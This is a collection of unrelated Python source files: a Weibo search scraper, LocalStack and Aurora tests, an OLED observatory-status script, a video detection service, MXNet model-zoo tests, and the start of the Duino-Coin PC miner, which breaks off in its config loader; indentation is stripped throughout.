weibo_from = content.find('.from').text()
card_act = i.find(('.card-act'))
feed_list_forward = 0
feed_list_comment = 0
feed_list_like = 0
for i in card_act.find('li').items():
# print(i.text())
if '转发' in i.text(): # '转发' marks the repost count
feed_list_forward = (i.text()).replace('转发', '')
continue
elif '评论' in i.text(): # '评论' marks the comment count
feed_list_comment = (i.text()).replace('评论', '')
continue
feed_list_like = (i.text())
if feed_list_forward == '':
feed_list_forward = 0
if feed_list_comment == '':
feed_list_comment = 0
if feed_list_like == '':
feed_list_like = 0
print(name, name_link, weibo_from, feed_list_forward, feed_list_comment, feed_list_like)
canshu['page_url'] = pageurl
canshu['name'] = name
canshu['name_link'] = name_link
canshu['weibo_from'] = weibo_from
canshu['txt'] = txt
canshu['feed_list_forward'] = feed_list_forward
canshu['feed_list_comment'] = feed_list_comment
canshu['feed_list_like'] = feed_list_like
canshu['search_time'] = begintime
canshu_list.append(canshu)
self.canshu_queue.put(canshu_list)
def req_index(self):
while True:
if self.urlqueue.qsize()%5==0:
sleep(10)
task_item=self.urlqueue.get()
url=task_item.get('url')
flag=task_item.get('flag')
id=task_item.get('id')
time=task_item.get('time')
pageurl = str(url).replace("indexpage", str(1))
data = self.get_data(pageurl)
doc = pq(data)
pl_feedlist_index = doc.find('#pl_feedlist_index')
if pl_feedlist_index.find('.card-no-result'):
self.urlqueue.task_done()
weibo_task =session.query(WeiboTask).filter_by(id=id).first()
weibo_task.flag='5'
session.commit()
continue
page=1
for i in pl_feedlist_index.find('.m-page .list .s-scroll li').items():
page = i.text().replace('第', '').replace('页', '') # strip the '第'/'页' ("page N") markers
print(page)
if int(page) > 0:
weibo_task = session.query(WeiboTask).filter_by(id=id).first()
weibo_task.flag = '1'
session.commit()
for page_num in range(1, int(page) + 1):
sec_url_item={}
pageurl = str(url).replace("indexpage", str(page_num))
sec_url_item['id']=id
sec_url_item['url']=pageurl
sec_url_item['time']=time
self.sec_urlqueue.put(sec_url_item)
self.urlqueue.task_done()
def seconde_run(self):
while True:
sec_task_item =self.sec_urlqueue.get()
pageurl =sec_task_item.get('url')
time =sec_task_item.get('time')
id =sec_task_item.get('id')
data = self.get_data(pageurl)
doc = pq(data)
pl_feedlist_index = doc.find('#pl_feedlist_index')
if pl_feedlist_index.find('.card-no-result'):
self.sec_urlqueue.task_done()
continue
self.parse_html(pl_feedlist_index,time,pageurl)
self.sec_urlqueue.task_done()
def insert(self):
while True:
canshu_list =self.canshu_queue.get()
for canshu in canshu_list:
weibo_info = WeiboInfo()
weibo_info.page_url = canshu.get('page_url')
weibo_info.name = canshu.get('name')
weibo_info.name_link = canshu.get('name_link')
weibo_info.weibo_from = canshu.get('weibo_from')
weibo_info.txt = canshu.get('txt')
weibo_info.feed_list_forward = canshu.get('feed_list_forward')
weibo_info.feed_list_comment = canshu.get('feed_list_comment')
weibo_info.feed_list_like = canshu.get('feed_list_like')
weibo_info.search_time = canshu.get('search_time')
self.session.add(weibo_info)
self.session.flush()
self.session.commit()
self.canshu_queue.task_done()
def run(self):
weibotask = self.session.query(WeiboTask).filter(WeiboTask.flag == '0').order_by(WeiboTask.time.desc()).all()
for i in weibotask:
task_item={}
task_item['id']=i.id
task_item['url']=i.url
task_item['flag']=i.flag
task_item['time']=i.time
self.urlqueue.put(task_item)
thread_list =[]
for i in range(1):
Treq_page = threading.Thread(target=self.req_index)
thread_list.append(Treq_page)
for i in range(100):
secTreq_page = threading.Thread(target=self.seconde_run)
thread_list.append(secTreq_page)
for i in range(1):
sqlTreq_page = threading.Thread(target=self.insert)
thread_list.append(sqlTreq_page)
for t in thread_list:
t.setDaemon(True)
t.start()
for q in [self.urlqueue,self.sec_urlqueue,self.canshu_queue]:
q.join()
if __name__ == '__main__':
weib = Weibo()
weib.run()
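# Illustrative sketch (not part of the original module): the crawler expects
# each WeiboTask.url to contain the literal placeholder "indexpage", which
# req_index()/seconde_run() replace with a concrete page number. A seed row
# might look like the following; the exact search URL format is an
# assumption for the example, not taken from this file:
#
#     task = WeiboTask()
#     task.url = 'https://s.weibo.com/weibo?q=keyword&page=indexpage'
#     task.flag = '0'
#     task.time = '2020-01-01'
#     session.add(task)
#     session.commit()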
|
test_metadata.py
|
import multiprocessing
import threading
from queue import Queue
from localstack.utils.analytics.metadata import get_client_metadata, get_session_id
def test_get_client_metadata_cache():
c1 = get_client_metadata()
c2 = get_client_metadata()
assert c1 is not None
assert c2 is not None
assert c1 is c2
def test_get_session_id_cache_not_thread_local():
calls = Queue()
def _do_get_session_id():
calls.put(get_session_id())
threading.Thread(target=_do_get_session_id).start()
threading.Thread(target=_do_get_session_id).start()
sid1 = calls.get(timeout=2)
sid2 = calls.get(timeout=2)
assert sid1 == sid2
def test_get_session_id_cache_not_process_local():
calls = multiprocessing.Queue()
def _do_get_session_id():
calls.put(get_session_id())
try:
multiprocessing.Process(target=_do_get_session_id).start()
multiprocessing.Process(target=_do_get_session_id).start()
sid1 = calls.get(timeout=2)
sid2 = calls.get(timeout=2)
assert sid1 == sid2
except AttributeError as e:
# fix for MacOS (and potentially other systems) where local functions cannot be used for multiprocessing
if "Can't pickle local object" not in str(e):
raise
|
test_transport.py
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from threading import Thread
import mock
import requests
from requests import exceptions as request_exceptions
from thrift.protocol import TJSONProtocol
from thrift.server import THttpServer
from thrift.transport import TTransport
from apache.aurora.common.transport import TRequestsTransport
from gen.apache.aurora.api import ReadOnlyScheduler
from gen.apache.aurora.api.ttypes import Response, ResponseCode, ServerInfo
class ReadOnlySchedulerHandler(object):
def getRoleSummary(self): # noqa
server_info = ServerInfo(clusterName='west', thriftAPIVersion=3)
return Response(responseCode=ResponseCode.OK, serverInfo=server_info)
def test_request_transport_integration():
handler = ReadOnlySchedulerHandler()
processor = ReadOnlyScheduler.Processor(handler)
pfactory = TJSONProtocol.TJSONProtocolFactory()
server = THttpServer.THttpServer(processor, ('localhost', 0), pfactory)
server_thread = Thread(target=server.serve)
server_thread.start()
_, server_port = server.httpd.socket.getsockname()
response = None
try:
transport = TRequestsTransport('http://localhost:%d' % server_port)
protocol = TJSONProtocol.TJSONProtocol(transport)
client = ReadOnlyScheduler.Client(protocol)
response = client.getRoleSummary()
finally:
server.httpd.shutdown()
assert response is not None
assert response.responseCode == ResponseCode.OK
assert response.serverInfo.clusterName == 'west'
assert response.serverInfo.thriftAPIVersion == 3
transport.close()
def test_request_transport_timeout():
session = mock.MagicMock(spec=requests.Session)
session.headers = {}
session.post = mock.Mock(side_effect=request_exceptions.Timeout())
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TJSONProtocol.TJSONProtocol(transport)
client = ReadOnlyScheduler.Client(protocol)
try:
client.getRoleSummary()
assert False, 'getRoleSummary should not succeed'
except TTransport.TTransportException as e:
assert e.message == 'Timed out talking to http://localhost:12345'
except Exception as e:
assert False, 'Only expected TTransportException, got %s' % e
transport.close()
def test_request_any_other_exception():
session = mock.MagicMock(spec=requests.Session)
session.headers = {}
session.post = mock.Mock(side_effect=request_exceptions.ConnectionError())
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TJSONProtocol.TJSONProtocol(transport)
client = ReadOnlyScheduler.Client(protocol)
try:
client.getRoleSummary()
assert False, 'getRoleSummary should not succeed'
except TTransport.TTransportException:
pass
except Exception as e:
assert False, 'Only expected TTransportException, got %s' % e
transport.close()
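# Illustrative sketch (not part of the original tests): the session_factory
# hook exercised above can also be used to attach custom headers to every
# request; the header name and token below are placeholders.
#
#     session = requests.Session()
#     session.headers['Authorization'] = 'Bearer <token>'
#     transport = TRequestsTransport('http://localhost:12345',
#                                    session_factory=lambda: session)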
|
main.py
|
import os.path
import time
import threading
import json
import click
from PIL import Image, ImageFont
from luma.core.interface.serial import i2c
from luma.oled.device import ssd1306
from luma.core.virtual import viewport
from luma.core.render import canvas
import requests
URL_BASE = 'http://10.73.224.41:5000'
URL_MISSION = '{}/mission/'.format(URL_BASE)
URL_CHALLENGE = '{}/challenge/'.format(URL_BASE)
URL_STATUS = '{}/'.format(URL_BASE)
STATUS_FACE = { 'FAILED':"serolbw_fail.png",
'CANCELED':"serolbw_fail.png",
'WINDOW_EXPIRED' : "serolbw_fail.png",
'COMPLETED' : "serolbw_thinking1.png",
'PENDING' : "serolbw_thinking6.png",
}
SECRETS_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),'secrets.json'))
THINKING = ['serolbw_thinking1.png','serolbw_thinking2.png','serolbw_thinking4.png','serolbw_thinking5.png','serolbw_thinking6.png','serolbw_thinking5.png','serolbw_thinking4.png','serolbw_thinking2.png']
serial = i2c(port=1, address=0x3C)
device = ssd1306(serial)
fontpath = os.path.abspath(os.path.join(os.path.dirname(__file__),"fonts","Affogato-Regular.ttf"))
class Looping(object):
def __init__(self):
self.isRunning = True
self.sequence = []
for img in THINKING:
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),"images", img))
logo = Image.open(img_path).convert("RGBA")
im = logo.resize(device.size)
self.sequence.append(im)
def runForever(self):
i = 0
size = len(THINKING)
while self.isRunning == True:
ia = i % size
img = self.sequence[ia]
device.display(img.convert(device.mode))
i += 1
time.sleep(0.05)
return
def show_img(img):
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),"images", img))
logo = Image.open(img_path).convert("RGBA")
im = logo.resize(device.size)
device.display(im.convert(device.mode))
time.sleep(4)
return
def show_msg(text):
font = ImageFont.truetype(fontpath, 16)
with canvas(device) as draw:
draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((5, 10), "{}".format(text), fill="white", font=font)
time.sleep(4)
return
def boot():
font_lg = ImageFont.truetype(fontpath, 30)
font_sm = ImageFont.truetype(fontpath, 12)
with canvas(device) as draw:
draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((30, 10), "Welcome to..", fill="white")
time.sleep(4)
with canvas(device) as draw:
draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((35, 0), "Serol", fill="white", font=font_lg)
draw.text((20, 32), "Cosmic Explorer", fill="white", font=font_sm)
time.sleep(4)
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),"images", 'serolscreenblack.png'))
logo = Image.open(img_path).convert("RGBA")
img = logo.resize(device.size)
device.display(img.convert(device.mode))
time.sleep(4)
return
def import_settings():
with open(SECRETS_FILE) as json_data:
d = json.load(json_data)
return d
def request_status(rid):
settings = import_settings()
headers = {'Authorization': 'Token {}'.format(settings['valhalla_token'])}
resp = requests.get('https://observe.lco.global/api/userrequests/{}/'.format(rid), headers = headers)
if resp.status_code not in [200, 201]:
return 'ERROR'
msg = resp.json()['state']
return msg
def check_status():
settings = import_settings()
for rid in settings['request_ids']:
show_msg("Checking {}".format(rid))
l = Looping()
t = threading.Thread(target = l.runForever)
t.start()
resp = request_status(rid)
l.isRunning = False
show_img(STATUS_FACE[resp])
time.sleep(10)
return
@click.command()
@click.option('--update', is_flag=True)
@click.option('--splash', is_flag=True)
def runner(update, splash):
if update:
check_status()
if splash:
boot()
return
if __name__ == "__main__":
try:
runner()
except KeyboardInterrupt:
pass
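# Illustrative sketch (not part of the original script): import_settings()
# loads SECRETS_FILE, and request_status()/check_status() expect at least
# these two keys. The values below are placeholders.
#
#     secrets.json:
#     {
#         "valhalla_token": "your-api-token",
#         "request_ids": [1234567, 1234568]
#     }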
|
service.py
|
"""
Main service module
"""
# pylint: disable=C0103,C0301,R0902
import threading
import datetime as dt
from videocapture import VideoCapture
from objdetector import ObjectDetector
import entities as e
class Service:
"""
Main app class with control loop
"""
def __init__(self, config, logger):
"""
Class initialization. Automatically starts event service loop thread as its last statement
config: json for instantiation of neural network and detection results sink classes
"""
self._stopEvent = False
self._detectorFree = True
self._logger = logger
self._initfromconfig(config)
self._mainthread = threading.Thread(target=self._mainLoop, name='service')
self._mainthread.start()
def _initfromconfig(self, config):
modulesconfig = config['modules']
# Video sources
self._cams = [VideoCapture(c['vsid'], c['uri'], self._logger) for c in config['cams']]
self._logger.info(f"Video sources: {[f'{c.vsid}:{c.uri}' for c in self._cams]}")
# Result subscriber
self._detectionResultSubscriber = getattr(__import__(config['resultsink']['module']), config['resultsink']['class'])(modulesconfig.get(config['resultsink']['class'], None), self._logger)
self._logger.info(f'Initialize result subscriber: {type(self._detectionResultSubscriber).__name__}')
# Neural network
nn = getattr(__import__(config['nn']['module']), config['nn']['class'])(modulesconfig.get(config['nn']['class'], None), self._logger)
self._logger.info(f'Initialize neural network: {type(nn).__name__}')
self._objDetector = ObjectDetector(nn, self._logger)
self._runinterval = config['runintervalsec']
self._logger.info(f"Service processing interval: {self._runinterval} sec")
_ = [threading.Thread(target=c.start, name=f'vsid-{c.vsid}', args=()).start() for c in self._cams]
def stop(self):
"""
stops service loop
"""
self._logger.info('Service stopping...')
self._stopEvent = True
self._objDetector.stop()
self._detectionResultSubscriber.stop()
for c in self._cams:
c.stop()
def _mainLoop(self):
ticker = threading.Event()
while not ticker.wait(self._runinterval) and not self._stopEvent:
if self._detectorFree:
self._detectionCycle()
else:
self._logger.warning('Detector is busy, skipping detection!')
self._logger.info('Service stopped')
def _detectionCycle(self):
self._detectorFree = False
for c in self._cams:
if c.isRunning:
(hasFrame, img, camid) = c.currentFrame()
if hasFrame:
frame = e.CapturedFrame(camid, dt.datetime.now(), img)
self._objDetector.pushImage(frame)
else:
c = VideoCapture(c.vsid, c.uri, self._logger)
threading.Thread(target=c.start, name=f'vsid-{c.vsid}', args=()).start()
dset = self._objDetector.getDetectedObjectsFrame()
self._detectionResultSubscriber.pushDetectedObjectsFrame(dset)
self._detectorFree = True
def join(self):
"""
waits main event loop thread to return
"""
self._mainthread.join()
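# Illustrative sketch (not part of the original module): the shape of the
# config dict consumed by _initfromconfig(). The module and class names
# below are placeholders, not implied by this file.
#
#     config = {
#         "cams": [{"vsid": "cam1", "uri": "rtsp://example/stream"}],
#         "resultsink": {"module": "examplesink", "class": "ExampleSink"},
#         "nn": {"module": "examplenet", "class": "ExampleNet"},
#         "modules": {"ExampleSink": {}, "ExampleNet": {}},
#         "runintervalsec": 5
#     }
#     # Service(config, logger) starts its main loop thread in __init__;
#     # call stop() and then join() to shut it down.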
|
test_gluon_model_zoo.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import setup_module, with_seed, teardown_module
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
@pytest.mark.parametrize('model_name', [
'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
pretrained_to_test = set(['squeezenet1.1'])
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.collect_params().initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
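# Illustrative sketch (not part of the original tests): the same model zoo
# call outside of pytest, using the model name and input shape conventions
# exercised above.
#
#     net = get_model('resnet18_v1', pretrained=False)
#     net.collect_params().initialize()
#     out = net(mx.nd.random.uniform(shape=(1, 3, 224, 224)))
#     out.wait_to_read()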
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock, cpu_count, current_process
import pip
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Requests is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"requests\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed. "
+ "Continuing without xxhash support.")
xxhash_enabled = False
# Global variables
MINER_VER = "2.5" # Version number
SOC_TIMEOUT = 60 # Socket timeout
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
server_ip_file = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") # Serverip file
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
def getString(string_name):
# Get string from the language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
prettyPrint(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
uptime = time() - start_time
# Check the largest unit first so the hours branch is actually reachable
if uptime >= 3600:
return round(uptime // 3600), "hours"
elif uptime >= 60:
return round(uptime // 60), "minutes"
return round(uptime), "seconds"
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " @ "
+ diffName)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if int(donation_level) > 0:
if osname == "nt":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable.exe").is_file():
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableLinux?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requested_diff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rig_identiier == "y" or rig_identiier == "Y":
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identiier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check whether efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check whether threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check whether the algorithm setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check whether the difficulty setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "NET"
# Check whether donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 60,
"discord_presence": "y"
}
# Write data to configfile
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
# Calculate efficiency for later use with the sleep function
efficiency = (100 - float(efficiency)) * 0.01
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
